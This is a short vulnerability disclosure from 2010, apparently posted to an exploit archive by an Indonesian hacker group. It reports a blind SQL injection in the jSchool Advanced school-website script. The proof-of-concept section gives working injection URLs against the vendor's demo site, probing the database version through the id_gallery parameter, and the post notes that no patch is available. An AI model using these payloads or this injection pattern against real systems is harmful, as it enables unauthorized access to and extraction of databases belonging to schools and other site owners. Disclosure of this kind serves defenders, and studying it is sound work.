----------------------------------------------------------------------- jSchool Advanced (Blind SQL Injection) Vulnerability ----------------------------------------------------------------------- Author : Don Tukulesto (root@indonesiancoder.com) Site : http://indonesiancoder.com Vendor : http://jogjacamp.com Software : jSchool Advanced (http://www.jogjacamp.com/script_4_Script_Website_Murah_Instant_Sekolah.html) Price : Rp. 1.200.000 GMT +07:00 November 21, 2010 ----------------------------------------------------------------------- I. Demo Site ----------------------------------------------------------------------- http://jogjacamp.org/demo/jschool_demo/index.php?action=gallery.list&id_gallery=5 II. POC ----------------------------------------------------------------------- http://jogjacamp.org/demo/jschool_demo/index.php?action=gallery.list&id_gallery=5 and substring(@@version,1,1)=5 # TRUE http://jogjacamp.org/demo/jschool_demo/index.php?action=gallery.list&id_gallery=5 and substring(@@version,1,1)=4 # FALSE III. Vendor patch ----------------------------------------------------------------------- Currently manufacturers do not provide patches or upgrades. IV. Credits ----------------------------------------------------------------------- Allahu Akbar INDONESIAN CODER ~ Server is Down ~ MC Crew ~ Surabayahackerlink ~ AntiSecurity M364TR0N ~ MISTER SAINT ~ Gonzhack ~ Cyb3r_Tr0n ~ kaMtiEz ~ ibl13z ~ N4ck0 ~ Huda ~ Xr0b0t Yurakha ~ aN93l1c ~ Arianom ~Mboys ~ Contrex ~ Mboys ~ n4KuLa_ ~ m4ho666 ~ k4L0ng666 kecemplungkalen ~ YaDoY666 ~ Jack- ~ xshadow ~ s4va ~ NoGe ~ kido ~ t3ll0 ~ cimpli